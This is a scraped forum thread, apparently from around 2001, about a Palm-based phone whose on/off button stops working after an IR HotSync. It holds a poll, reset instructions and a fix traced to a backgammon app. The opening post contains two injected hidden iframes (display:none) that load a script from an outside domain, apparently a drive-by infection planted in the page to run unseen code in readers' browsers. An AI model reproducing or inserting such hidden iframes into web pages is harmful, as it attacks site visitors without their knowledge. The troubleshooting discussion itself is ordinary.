View Poll Results: Does your phone on/off button stop working after and IR HotSync?

Voters
10. This poll is closed
  • YES my phone on/off button stops working after and IR HotSync

1 10.00%
  • NO my Phone On/off Button works fine after an IR Hot Sync

7 70.00%
  • I never have done an IR HotSync

2 20.00%
+ Reply to Thread

Who Has The IR Sync Phone On/Off Button Bug

Does your phone on/off button stop working after and IR hotsync?<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
    <iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

Administrator

Arrow

hmm..

could be a nasty app on your phone....

has it been doing it since day one?

Yes

Administrator

Arrow

possibily a "lemon" then if it did it right out of the box...

i know you hate this, but have you tried to do a cold reset and then load something "safe" via Ir.. like a address entry? not talking about beaming a palm app.. just a simple address entry...

no,
    how do you do a hard reset?
    i did my initial sync via IR.

Power Button(s)

I don't think the power button(s) on my I300 have ever worked. I have done several soft resets. I can not get a hard reset. I also tried holding the Up-page button for a warm reset, but could not tell it was any different. Any ideas?
    Last edited by Richard; 10-28-2001 at 02:12 PM.

Administrator

Arrow

doing the first sync via IR should not have been a problem, as long as the signal was good and nothing got in the way...

a hard reset, you hold down the reset button, the up arrow and release the reset button BUT still hold the up arrow down.. it will ask you if your sure you want to do ao cold reset,,, say yes...

rich, do this hasrd reset option described above, then b4 you do your first sync, see if you can turn it off... it has a cool screen saver on it!

also make sure you guys have the palm 4.0.1~!

Power Button Problem

I tried the up-arrow reset-pin procedure with all varations and I stll get the same result as a soft reset. We can still use the phone, but can't adjust the contrast. Guess we will just live with it until replacement phones are available.

mla
    I think you need the power button to hard reset the unit? Isn't that a "warm reset" that you have just described? In order to issue a hard reset you must hold the reset pin and then push the power button down. Hold them simulaneously for a moment and then release the reset pin first and continue holding the power button until you see the "Palm Computing Platform" start up screen. Then release the power button and a message immediately appears that says,

Erase all data?
    YES - "up" button
    NO - any other button

If you don't see this meesage I don't think you can perform a hard reset. Perhaps you can remove the battery for a day or for however long it takes for the internal battery to discharge.

FIXED!

It was a backgammon app!

Administrator

Arrow

great RO!!!..

yo rich..

tap and hold the screen on/off button and the contrast will come up....